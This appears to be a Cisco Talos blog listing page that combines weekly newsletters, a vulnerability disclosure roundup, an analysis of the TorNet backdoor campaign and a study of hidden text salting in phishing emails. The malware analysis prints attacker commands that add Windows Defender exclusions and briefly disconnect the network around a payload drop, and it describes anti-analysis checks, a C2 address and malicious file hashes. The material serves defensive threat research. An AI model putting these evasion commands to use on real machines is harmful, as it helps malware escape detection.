One pointer to the nature of future threats against AI systems is a technique used in spam that Talos recently blogged about. Hiding the nature of the content displayed to the recipient from anti-spam systems is not a new technique. Spammers have included hidden text or used formatting rules to camouflage their actual message from anti-spam analysis for decades. However, we have seen increase in the use of such techniques during the second half of 2024.

**Why do I care?**

Parsers which are required for computers to understand text content, view the world very differently from humans. The human eye ignores text in miniscule font or can’t detect black letters on a black background, but this is not necessarily the case for parsers. Where the human eye sees readily readable text, the parser can see the gibberish that spammers have included to confuse them. Potentially the opposite is also true with humans seeing gibberish, but language parsing software seeing readable text.

Being able to disguise and hide content from machine analysis or from human oversight is likely to become a more important vector of attack against AI systems as they become a larger part of our lives. 

**So now what?**

Fortunately, the techniques to detect this kind of obfuscation are well known and already integrated into spam detection systems such as Cisco Email Threat Defense. Conversely, the presence of attempts to obfuscate content in this manner makes it obvious that a message is malicious and can be classed as spam.

**Top security headlines of the week**

Another incident of an undersea telecommunications cable being cut in the Baltic was encountered. (CNN). Organisations need to plan for the effects of a major telecommunications outage or internet bandwidth restriction affecting their business.

Three members of Russia’s GRU have been placed under sanctions for their suspected role in conducting cyber attacks against Estonia in 2020 (SecurityAffairs). Threat actors might try to hide their identities but eventually they will be discovered and held to account for their actions.

A botnet consisting of infected IoT devices is behind the largest ever DDoS attack (Help Net Security). Small network connected devices can easily be overlooked as part of a cyber security strategy, but they can be compromised by threat actors and used for nefarious purposes.

**Can't get enough Talos?**

Today we released the new Cisco Talos Quarterly Trends Report - covering incidents from October to December 2024. The big call out? Threat actors are increasingly deployed web shells against vulnerable web applications. They primarily exploited vulnerable or unpatched public-facing applications to gain initial access, a notable shift from previous quarters.

Watch Hazel, Joe and Craig break down the report - they discuss hunting down web shells, the Interlock ransomware, and the increasing use of remote access tools within ransomware attacks.

**Upcoming events where you can find Talos**

Talos team members: Martin LEE, Thorsten ROSENDAHL, Yuri KRAMARZ, Giannis TZIAKOURIS, and Vanja SVAJCER will be speaking at Cisco Live EMEA. Amsterdam, Netherlands, 9-14 February.  (Cisco Live EMEA)

**Most prevalent malware files of the week**

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**VirusTotal:**https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**Typical Filename:** VID001.exe  
**Detection Name:** Simple\_Custom\_DetectionClaimed Product: 

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
**MD5:** 71fea034b422e4a17ebb06022532fdde  
**VirusTotal:** https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Coinminer:MBT.26mw.in14.Talos

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**VirusTotal:** https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

Defeating Future Threats Starts Today

This new report from Cisco Talos Incident Response explores how threat actors increasingly deployed web shells against vulnerable web applications, and exploited vulnerable or unpatched public-facing applications to gain initial access.

Talos IR trends Q4 2024: Web shell usage and exploitation of public-facing applications spike

Cisco Talos’ Vulnerability Research team recently disclosed three vulnerabilities in Observium, three vulnerabilities in Offis, and four vulnerabilities in Whatsup Gold.   
These vulnerabilities exist in Observium, a network observation and monitoring system; Offis DCMTK, a collection of libraries and applications implementing DICOM (Digital Imaging and Communications

Wednesday, January 29, 2025 11:45

Cisco Talos’ Vulnerability Research team recently disclosed three vulnerabilities in Observium, three vulnerabilities in Offis, and four vulnerabilities in Whatsup Gold.   

These vulnerabilities exist in Observium, a network observation and monitoring system; Offis DCMTK, a collection of libraries and applications implementing DICOM (Digital Imaging and Communications in Medicine) standard formats; and WhatsUp Gold, an IT infrastructure management product.  

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.  

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.   

**Observium Vulnerabilities  **

_Discovered by Marcin "Icewall" Noga._   

Two cross-site scripting vulnerabilities exist in Observium, which can lead to arbitrary JavaScript code execution, as well as one HTML code injection vulnerability. All three can be triggered by an authenticated user clicking a malicious link crafted by the attacker.  

*   TALOS-2024-2090 (CVE-2024-47140) 
*   TALOS-2024-2091 (CVE-2024-47002) 
*   TALOS-2024-2092 (CVE-2024-45061) 

**Offis Vulnerabilities  **

_Discovered by Emmanuel Tacheau._   

Three vulnerabilities were found in the Offis DCMTK libraries that support the DICOM standard format. TALOS-2024-1957 (CVE-2024-28130) is an incorrect type conversion vulnerability that can lead to arbitrary code execution, and TALOS-2024-2121 (CVE-2024-52333) and TALOS-2024-2122 (CVE-2024-47796) are improper array index validation vulnerabilities that can lead to out-of-bounds write capabilities. All can be triggered with specially crafted malicious DICOM files.  

**Whatsup Gold Vulnerabilities  **

_Discovered by Marcin "Icewall" Noga._   

Two Whatsup Gold vulnerabilities include a risk of information disclosure (TALOS-2024-1932 (CVE-2024-5017) and TALOS-2024-2089 (CVE-2024-12105)), which can be triggered by an attacker making an authenticated HTTP request. 

There is also a risk of disclosure of sensitive information (TALOS-2024-1933 (CVE-2024-5010)), and denial of service (TALOS-2024-1934 (CVE-2024-5011)). These two vulnerabilities can be triggered by an attacker making an unauthenticated HTTP request.

Whatsup Gold, Observium and Offis vulnerabilities

Cisco Talos discovered an ongoing malicious campaign operated by a financially motivated threat actor targeting users, predominantly in Poland and Germany.

Tuesday, January 28, 2025 06:00

*   Cisco Talos discovered an ongoing malicious campaign operated by a financially motivated threat actor since as early as July 2024 targeting users, predominantly in Poland and Germany, based on the phishing email language. 
*   The actor has delivered different payloads, including Agent Tesla, Snake Keylogger, and a new undocumented backdoor we are calling TorNet, dropped by PureCrypter malware.  
*   The actor is running a Windows scheduled task on victim machines—including on endpoints with a low battery—to achieve persistence.  
*   The actor also disconnects the victim machine from the network before dropping the payload and then connects it back to the network, allowing them to evade detection by cloud antimalware solutions.  
*   We also found that the actor connects the victim’s machine to the TOR network using the TorNet backdoor for stealthy command and control (C2) communications and detection evasion. 

**The campaign **

The intrusions start with a phishing email as the initial infection vector. The actor is impersonating financial institutions and manufacturing and logistics companies by sending fake money transfer confirmations and fake order receipts, respectively. The phishing emails are predominantly written in Polish and German, indicating actor’s intent to primarily target users in those countries. We also found some phishing email samples from the same campaign written in English. We assess with medium confidence that the actor is financially motivated, based on the phishing email themes and the filenames of the email attachments.  

The phishing email has attachments with the file extension “.tgz”, indicating that the actor has used GZIP to compress the TAR archive of the malicious attachment file to disguise the actual malicious content of the attachment and evade email detections. 

Sample phishing email in Polish. 

Sample phishing email in German. 

When a user opens the compressed email attachment and manually unzips it and runs a .NET loader executable, it eventually downloads encrypted PureCrypter malware from a compromised staging server. The Loader decrypts the PureCrypter malware and runs it in the system memory.  

In a few intrusions in this campaign, we found that the PureCrypter malware drops and runs the TorNet backdoor. The TorNet backdoor establishes connection to the C2 server and also connects the victim machine to the TOR network. It has the capabilities to receive and run arbitrary .NET assemblies in the victim machine’s memory, downloaded from the C2 server, increasing the attack surface for further intrusions. 

**.NET loader implants PureCrypter **

Talos found that the compressed attachment files contain a large .NET executable file. The actor has instrumented the .NET executable to either download the next-stage malicious executables from a remote staging server or to reflectively load an embedded malicious binary.  

Some of the loader samples we analyzed in this campaign download the AES-encrypted binary of the PureCrypter malware hosted on compromised websites in paths “/filescontentgalleries/pictorialcoversoffiles/” and “/post-postlogin/” using a hardcoded URL. The encrypted PureCrypter binaries were stored with the arbitrary filenames using different file extensions, including .pdf, .dat, .wav, .vdf, .mp3 and .mp4. The loader decrypts the PureCrypter binary and loads reflectively. 

Snippet of the loader program that downloads the encrypted PureCrypter malware.

Network traffic showing the encrypted PureCrypter malware downloaded from the hosting site. 

In a few other loader samples, we found that the encrypted PureCrypter sample was embedded in the loader, which is decrypted using the AES algorithm and reflectively loaded into the victim machine’s memory.  

Snippet of the loader with embedded PureCrypter binary. 

**PureCrypter drops the TorNet backdoor **

The PureCrypter malware found in this intrusion is a Windows dynamic-link library obfuscated with Eziriz’s .NET Reactor obfuscator. It has resources of encrypted binaries of legitimate DLLs, including Protobuf-net and Microsoft task scheduler DLL along with the TorNet backdoor.  

PureCrypter initially creates a mutex on the victim machine and executes the command to release the currently assigned DHCP IP address of the victim machine, establishes persistence, performs various anti-analysis and detections tasks, drops and runs the payload, and finally executes a command to renew the IP address of the victim machine.  

Cmd /c ipconfig /release 
Cmd /c ipconfig /renew 

The threat actor is likely using this technique to evade detections from the cloud-based anti-malware programs by disconnecting the victim machine from the network and connects back to the network after dropping and running the backdoor.  

The PureCrypter malware performs various anti-debugger, anti-analysis, anti-VM, and anti-malware checks on the victim machine as described below: 

*   It checks if the process is debugged using the function “CheckRemoteDebuggerPresent”. 
*   It checks for the Sandboxie and Cuckoo sandbox environments by enumerating processes to look for “sbieDLL.dll” and “cuckoomon.dll”. 
*   It checks if the DLL is running in the virtual environment by executing the WMI queries and searches for the strings “VMware”, “VIRTUAL”, “AMI”, and “Xen”.  

Select \* from Win32\_BIOS 
Select \* from Win32\_ComputerSystem 

*   It also checks if the process running is associated with “vmGuestLib.dll” to detect the VMWare environment. 
*   It checks if the victim machine username is “john” or “anna” or “xxxxxxxx”.  
*   It checks for the strings “amsi.dll” and “amsiscanbuffer” in the running processes modules of the victim machine.  
*   It checks if the Event Tracing for Windows (ETW) is configured for the victim machine by attempting to check if any processes point to the function “EtwEventWrite” of “ntdll.dll”.  
*   It modifies the Windows Defender settings by executing the PowerShell commands to add its process and the path of the dropped backdoor to the exclusion lists.

Add-MpPreference –ExclusionPath 
Add-MpPreference –ExclusionProcess 

After the evasion checks, PureCrypter decrypts the encrypted backdoor from its resource and drops it to the user profile application temporary folder with a random file name. It also decrypts another file resource using a custom string decryption algorithm, generating the arbitrary filename strings and the task name strings for the Windows Task scheduler.  

PureCrypter establishes the persistence in the Run registry key by adding the path of the loader. It also creates a Windows task using a task name gained by decrypting the strings from the resource file and executes the loader every two to four minutes with no execution time limit. The task can run if the machine switches to battery power and will not stop if it runs on a low battery power. The threat actor has instrumented this technique to possibly ensure an uninterrupted infection avoiding the victim machine operating system to deprioritize the process when a victim machine is running on low battery power mode.  

Code snippet of creating the Windows schedule task. 

PureCrypter drops a Visual Basic script in the Windows startup folder with the instructions to load and execute the dropped backdoor. 

Code Snippet showing the command to drop and execute a VB Script.

After establishing persistence, PureCrypter loads the dropped backdoor by accessing it through a URL scheme “file\[://\]<Path of the dropped backdoor>” and injects the backdoor into the .NET runtime executable process in the victim machine. The threat actor is using this technique to possibly masquerade the file access activity as a web request in the victim machine logs and to bypass detections for loading a file from suspicious file paths on the victim machine.  

Code snippet showing the process injection.

**Payload TorNet creates a backdoor on the victim machine **

Talos discovered a new .NET backdoor as the payload in the recent intrusions of this campaign, which we call TorNet. TorNet backdoor is also obfuscated with Eziriz’s .NET Reactor obfuscator and has hash values for the compilation time. This could be the artifact that was created when the samples were compiled in Visual Studio with the “/deterministic” parameter. When Visual Studio is configured to generate deterministic binaries, the compiled date/time field of the binaries will be replaced by a hash of the compilation options. Talos had previously seen, and reported this technique used by other threat actors to disguise the actual compilation time of the malware binaries.    

TorNet initially decodes a base64-encoded string to obtain the C2 domain, port number, and an alphanumeric string of 16 characters (5e7a81857a353068). It then performs the anti-debugging, anti-malware, anti-VM, and sandbox evasion checks similar to PureCrypter we discussed in the previous section.  

Code snippet showing the base64 string decoding to obtain the string, C2 domain, and port number. 

After the evasion checks, TorNet establishes a TCP socket connection to the C2 server by resolving the IP address of the C2 domain decoded from the base64-encoded string. The connection uses one of the port numbers 8194, 7890, or 8410. We observed that the C2 domains used by the backdoor were resolving to the IP address 104\[.\]168\[.\]7\[.\]37 during the period of our research. 

TorNet backdoor sample connecting to the C2 using the domain and port number.

After establishing the connection to the C2 server, TorNet sends the gained string “5e7a81857a353068” by decoding the base64-encoded strings to the C2 server, creating a hexadecimal byte stream of length 20 and writes it to a memory stream by compressing it using the GzipStream function.  

HEX stream: “3A 12 12 10 35 65 37 61 38 31 38 35 37 61 33 35 33 30 36 38” 

ASCII equivalent: “:<2-byte place holder>\\n5e7a81857a353068” 

TorNet then generates an MD5 hash value of the string “5e7a81857a353068” and uses it as a key to encrypt the compressed 20-byte hexadecimal data stream using the triple DES algorithm. Using the Bitconverter function, TorNet splits the encrypted byte stream and sends it to the C2 server by writing it to the TCP stream through the socket.  

Code snippet of TorNet showing the data exfiltration to the C2 server through sockets. 

The C2 server may send an arbitrary encrypted .NET assembly as a response to a TorNet’s request. TorNet will decrypt the arbitrary binary and reflectively run it. During our research, we were unable to receive a response from the C2, still analyzing the TorNet binary allowed us to assess that the received response will be an arbitrary .NET assembly code, enabling the attack surface for further attack.  

Code snippet for running the received arbitrary .NET assembly. 

TorNet also connects the victim machine to the TOR network. It downloads the TOR expert bundle from the TOR Project archive site, unpacks it and runs the “tor\[.\]exe” as a background process to connect to TOR.  

Code snippet shows the download and execution of tor\[.\]exe. 

Once TOR is running, TorNet connects to the TOR network using the TOR SocksPort (127\[.\]0\[.\]0\[.\]1:9050), and with the “socket.Poll” function, it routes all traffic from the backdoor process on the victim machine through the TOR network. The threat actor is leveraging the TOR network to anonymize the C2 communication and evade detection.  

Connections from TorNet on analysis machine to the TOR nodes.

****Coverage** **

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. 

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 64440, 64439, 64437, 64438 and 301115. 

ClamAV detections are also available for this threat: 

Win.Backdoor.TorNet-10041435-0    
Win.Downloader.TorNet-10041463-0    
Win.Malware.TorNet-10041565-0    
Win.Malware.TorNet-10041601-0    
Win.Trojan.TorNet-10041734-0 

**Indicators of Compromise  **

IOCs for this threat can be found in our GitHub repository here.

New TorNet backdoor seen in widespread campaign

Hidden text salting is a simple yet effective technique for bypassing email parsers, confusing spam filters, and evading detection engines that rely on keywords. Cisco Talos has observed an increase in the number of email threats leveraging hidden text salting.

Friday, January 24, 2025 08:37

*   Cisco Talos observed an increase in the number of email threats leveraging hidden text salting (also known as "poisoning") in the second half of 2024.
*   Hidden text salting is a simple yet effective technique for bypassing email parsers, confusing spam filters, and evading detection engines that rely on keywords. The idea is to include some characters into the HTML source of an email that are not visually recognizable.
*   Talos observed this technique being used for various purposes, including evading brand name extraction by email parsers, confusing language detection procedures, and evading spam filters and detection engines in HTML smuggling.

**Introduction to hidden text salting**

Hidden text salting (or "poisoning") is an effective technique employed by threat actors to craft emails that can evade parsers, confuse spam filters, and bypass detection systems that rely on keywords. In this approach, features of the Hypertext Markup Language (HTML) and Cascading Style Sheets (CSS) are used to include comments and irrelevant content that are not visible to the victim when the email is rendered in an email client but can impact the efficacy of parsers and detection engines.

Due to the simplicity of hidden text salting and the number of ways threat actors can insert gibberish content in emails, this approach can introduce significant challenges to email parsers, spam filters, and detection engines.

**Technical explanation**

Talos has observed the use of hidden text salting for multiple purposes, such as evading brand name extraction by email parsers. Below is an example of a phishing email that impersonates the Wells Fargo brand.

A phishing email impersonating the Wells Fargo brand.

The HTML source of the above email is shown below. The **<style>** tag is used to define style information for an email via CSS. Inside the **<style>** element, one can specify how HTML elements should render in a browser or email client. The **<style>** element must be included inside the **<head>** section of the document. In this example, threat actors have set the **display** property to **inline-block**. When **inline-block** is used instead of **inline**, one can set a width and height on the element. In this case, the block’s width is set to zero. Additionally, the **overflow** property is set to “hidden,” resulting in the content outside the element box not being shown to the victim when the email is rendered in the email client.

The HTML source snippet of the above phishing email shows how the 'width' property in CSS is used to hide the irrelevant characters inserted between the letters of the Wells Fargo brand.

As a second example, the following email shows a phishing email, sent to another customer, that impersonates the Norton LifeLock brand.

A phishing email impersonating the Norton LifeLock brand.

In this case, threat actors have inserted Zero-Width SPace (ZWSP) and Zero-Width Non-Joiner (ZWNJ) characters between the letters of Norton LifeLock to evade detection. Although these characters are not visible to the naked eye, they are still considered characters or strings of characters by most email parsers. Therefore, one can consider them invisible characters.

The HTML source snippet of the above phishing email, with Zero-Width SPace (ZWSP) and Zero-Width Non-Joiner (ZWNJ) characters inserted between the letters of the Norton LifeLock brand.

Hidden text salting has also been used to confuse language detection procedures, thus evading possible spam filters that rely on such procedures. The example below shows a phishing email that impersonates the Harbor Freight brand. As it is visually obvious, the language of this email is English.

A phishing email impersonating the Harbor Freight brand.

However, a closer inspection of the email’s headers shows that the language of this email has been identified as French, as it is saved in the **LANG** field of Microsoft's **X-Forefront-Antispam-Report anti-spam** header. The LANG field specifies the language in which the message was written, and the **X-Forefront-Antispam-Report** header contains information about the message and how it was processed. This header is added to each message by Exchange Online Protection (EOP), Microsoft's cloud-based filtering service.

A snippet of the above email’s header shows French as the identified language of this email by Microsoft's cloud-based filtering service, called EOP.

When the HTML source of this email is inspected, several French words and sentences are found that are visually hidden. In this case, threat actors have used the **display** property of the **div** element to hide the French words, thus confusing the language detection module of Microsoft.

The HTML source snippet of the above phishing email, with French characters that are hidden using the display property.

Another case where hidden text salting has been used is in HTML smuggling in order to bypass detection engines (see the example below).

A spear phishing email with an HTML attachment.

A snippet of the HTML attachment from the above email is shown below. Threat actors have inserted multiple irrelevant comments between the base64-encoded characters to prevent file attachment parsers from easily putting these strings together and decoding them.

The HTML source snippet of the above phishing email, with irrelevant comments inserted between the base64-encoded characters.

**Mitigation**

The above cases are just a few examples demonstrating how simple and effective this technique is in evading detection. Detecting email content concealed through this technique, which is used to poison the HTML source of an email, is important since it poses significant challenges in identifying email threats that leverage this method. A few mitigation and detection strategies are discussed below that could be helpful in this mission.

**Advanced filtering techniques**: One mitigation strategy is to investigate and develop advanced filtering techniques that can more effectively detect hidden text salting and content concealment. For example, filtering systems could be made to identify questionable usage of CSS properties like visibility (e.g., "visibility: hidden") and display (e.g., "display: none") that are frequently used to conceal text. These systems could also examine the structure of the HTML source of emails to find the excessive use of inline styles or unusual nesting of elements that might suggest an effort to hide content.

**Relying on visual features**: Although improved filtering systems can be very useful in detecting hidden text salting and email threats that use this technique to avoid detection, threat actors can swiftly develop new techniques. Therefore, relying on some features in addition to the text domain, such as the visual characteristics of emails, could be helpful.

**Protection**

Protecting against these sophisticated and devious threats requires a comprehensive email security solution that harnesses AI powered detections. Secure Email Threat Defense utilizes unique deep and machine learning models, including Natural Language Processing, in its advanced threat detection systems that leverage multiple engines. These simultaneously evaluate different portions of an incoming email to uncover known, emerging, and targeted threats. This differentiated AI technology also extracts and analyzes the _content_ of image-only emails that aim to evade text-based detections.

Secure Email Threat Defense identifies malicious techniques used in attacks targeting your organization, derives unparalleled context for specific business risks, provides searchable threat telemetry, and categorizes threats to understand which parts of your organization are most vulnerable to attack.  

Start fortifying your environment against advanced threats. Sign up for a free trial of Email Threat Defense today.

Seasoning email threats with hidden text salting

Joe shares his recent experience presenting at the 32nd Crop Insurance Conference and how it's important to stay curious, be a forever student, and keep learning.

Thursday, January 23, 2025 14:05

Welcome to this week’s edition of the Threat Source newsletter.

Hello friends! Joe here again! I have just returned from the frozen northern tundra of Fargo, North Dakota. This was my first real visit to the frigid climates of the Midwest, and I have to say, they take cold to a new level. I was invited to present on cybersecurity at the 32nd Crop Insurance Conference, hosted by North Dakota State University (go Bisons!).

If you’re wondering why I or anyone would care to discuss cybersecurity in such a niche industry, the answer is simple: Everything is connected to security, even something you wouldn’t think would nominally matter. Agriculture and adjacent industries are roughly 6 percent of our GDP and account for about 10 percent of all U.S. jobs. The trillions of dollars that industry generates are targets for cyber-crime-motivated threat actors and nation-states who would seek to degrade it.

Agriculture is also a deeply underserved community and industry with regard to cybersecurity. And that’s both in general security literacy and security investments. So, I have a soft spot for folks up against threat actors who seek to exploit the most vulnerable, like agriculture industries. If the knowledge I can share will help them and their businesses stay more secure, it’s always worth it.

Pro-tip: If you ever find yourself at a conference, maybe to give a presentation, stay and listen beyond your time on the stage. For security conferences, sure, but for super niche or industry-specific conferences? Even better. I’m not a farmer or in agriculture, but I learned a lot in North Dakota. So, sit through other presentations – the further away from cyber security it is, the better. There’s more to this industry than malware analysis, threat actor cluster tracking, and incident response. For example, at this conference, I learned about climate change affecting agriculture, trade tariffs, agronomics, and insurance. You never know when that knowledge will pay dividends down the road for cybersecurity research. Stay curious, be a forever student, and keep learning.

**The one big thing**

Remember the old meme ‘Good luck, I’m behind seven proxies? Well, it still holds up in this Talos blog post. Proxy chains are something that hit our radar as old as VPNFilter, back in 2018. It’s a smart way to do business if your obscurity is your primary goal. TOR or other proxy solutions may have weaknesses that expose your operations to risk, and that’s why they’re getting more and more crafty about it. And we’ve moved far past generic VPN services for obscurity. Network defenders can find themselves between a rock and a hard place forensically when determining malicious connections to their networks.

**Why do I care?**

This is always going to be a sore point for network defenders. Adversaries are absolutely going to use and abuse any kind of proxy service to launch their attacks from. It’s an absolute given. It goes off the rails when it’s your own employees too. As per the blog post “Organizations need to realize that attacks can come from anywhere, even the same IP space that your employees connect to their VPNs, so plan accordingly.”

**So now what?**

Using additional controls and forensic data is a must here. Identity and access management, combined with a mobile device management/application solution is key here. Control as much of your ecosystem as you absolutely can. This isn’t cheap, but it’s most certainly a step up from implementing MFA and hoping for the best.

**Top security headlines of the week**

*   Hold onto your seats – Mirai came in super-hot with a massive 5.6 Tbps DDoS attack. So far, the largest ever recorded. (Hacker News)
*   Here’s some sobering statistics about healthcare data breaches. “Between 2009 and 2023, 5,887 healthcare data breaches of 500 or more records were reported to OCR \[sic\] Office of Civil Rights. Those breaches have resulted in the exposure or impermissible disclosure of 519,935,970 healthcare records. That equates to more than 1.5x the population of the United States.” (HIPAA Journal) 
*   Businesses are folding a lot more due to cyber-attacks, and mostly at small and medium-sized businesses, which absolutely jives with what we see at Talos. Ransomware cartels love to target the small business. Cyber Insurance may be the saving grace here. (Bloomberg Law) 

**Can’t get enough Talos?**

*   My colleague Martin Lee did an amazing Net Academy series on threat intelligence 101. If you’re a NetAcad member, I highly suggest you watch it! And if not, sign up. It’s free!
*   In running the biggest scam ever, I still get to be on Talos podcasts. Listen to myself and my colleagues discuss crossword puzzles and why Pauly Shore gets a bad rap.

**Upcoming events where you can find Talos **

Cisco Live EMEA (February 9-14, 2025)   
Amsterdam, Netherlands

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5  
**MD5:** ff1b6bb151cf9f671c929a4cbdb64d86  
**VirusTotal:** https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5    
**Typical Filename:** endpoint.query  
**Claimed Product:** Endpoint-Collector  
**Detection Name:** W32.File.MalParent

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**VirusTotal:** https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**Typical Filename:** VID001.exe  
**Detection Name:** Simple\_Custom\_Detection

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
**MD5:** 71fea034b422e4a17ebb06022532fdde  
**VirusTotal:** https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Coinminer:MBT.26mw.in14.Talos

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**VirusTotal:** https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details%C2%A0  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

Everything is connected to security

Bill discusses how to find 'the helpers' and the importance of knowledge sharing. Plus, there's a lot to talk about in our latest vulnerability roundup.

Thursday, January 16, 2025 14:15

Welcome to this week’s edition of the Threat Source newsletter. 

“When I was a boy and I would see scary things in the news, my mother would say to me, ‘Look for the helpers. You will always find people who are helping.’” 

 ― Fred Rogers 

There’s no world where following Mr. Roger’s advice is wrong. With the wildfires raging in Greater Los Angeles now more than ever I am very aware of the need to look for the helpers. I get it, I see the news and it’s overwhelming and terrifying. So Gentle Reader I’m asking that instead of just finding the helpers – be the helper.  

 I’d like everyone to take a moment and think about what you can do to be a helper – not just with the catastrophic fires and the incredible destruction but in your own world. In your home life and in your work life. Nothing is more intrinsic to information security than the sharing of knowledge and information. It’s how we all got the roles that we are in now. The older I get the more joy I find in sharing anything and everything that I know. I’m proud to be a mentor in Cisco’s

Women in Cybersecurity

and outside of work I’ve started volunteering to teach English as a second language – and cannot tell you how rewarding both are. There are so many incredible non-profits that you can give your time and money. Do both. There are so many infosec groups that are in need of your time, your invaluable experience, and mentorship. Be the helper. Find a local group, find an internal team within your organization, and if you can’t find one – create one.  

 Be the helper.  

Let’s use this terrible event as a driver to push us all to do more to be the helpers. After all, what would Mr. Rogers do?  

**The one big thing **

Cisco Talos discovered forty-four vulnerabilities, and sixty-three CVEs were discovered across ten .cgi and three .sh files, as well as the static login page, of the Wavlink AC3000 wireless router web application.   

 The Wavlink AC3000 wireless router is one of the most popular gigabit routers in the US, in part due to both its potential speed capabilities and low price point. Talos is releasing these advisories in accordance with Cisco’s third-party vulnerability 

**Why do I care? **

  
An attacker can send a specially crafted set of network packets over WAN to gain root access to the router via the wcrtrl service and static login credentials. With the ongoing state-sponsored attacks on infrastructure this is critical to a secure environment.  

**So now what? **

   
Cisco Talos has released several Snort rules and ClamAV signatures to detect and defend against the exploitation of these vulnerabilities.  

**Top security headlines of the week **

Hackers are exploiting a new Fortinet firewall bug to breach company networks. (TechCrunch) 

CISA is urging federal agencies to patch a command injection flaw tracked as CVE-2024-12686, otherwise known as BT24-11, and has added it to the Known Exploited Vulnerabilities (KEV) Catalog. The medium-severity security bug was found as a part of BeyondTrust's Remote Support SaaS Service security investigation, which was launched after a major data breach at the US Treasury Department. (DarkReading)  

Microsoft rings in 2025 with record security update. Microsoft has issued patches for an unprecedented 159 CVEs, including eight zero-days, three of which attackers are already exploiting. (DarkReading)  

**Can’t get enough Talos? **

*   Slew of Wavlink Vulnerabilities  
*   Evolution and Abuse of Proxy Networks 
*   Patch Tuesday was a big one 

Our latest Talos Takes podcast sees Hazel sits down with Vanja Svajcer to discuss new research on vulnerable drivers.

**Upcoming events where you can find Talos **

Cisco Live EMEA (February 9-14, 2025)     
Amsterdam, Netherlands 

**Most prevalent malware files from Talos telemetry over the past week  **

 SHA 256:7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5   

MD5: ff1b6bb151cf9f671c929a4cbdb64d86   

VirusTotal : https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5 

Typical Filename: endpoint.query   

Claimed Product: Endpoint-Collector   

Detection Name: W32.File.MalParent   

SHA 256:9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 

MD5: 2915b3f8b703eb744fc54c81f4a9c67f 

 VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 

Typical Filename: VID001.exe 

Detection Name: Simple\_Custom\_Detection 

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  

MD5: 71fea034b422e4a17ebb06022532fdde  

VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 

Typical Filename: VID001.exe 

Claimed Product: N/A   

Detection Name: Coinminer:MBT.26mw.in14.Talos 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91   

MD5: 7bdbd180c081fa63ca94f9c22c457376  

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details%C2%A0 

Typical Filename: c0dwjdi6a.dll  

Claimed Product: N/A   

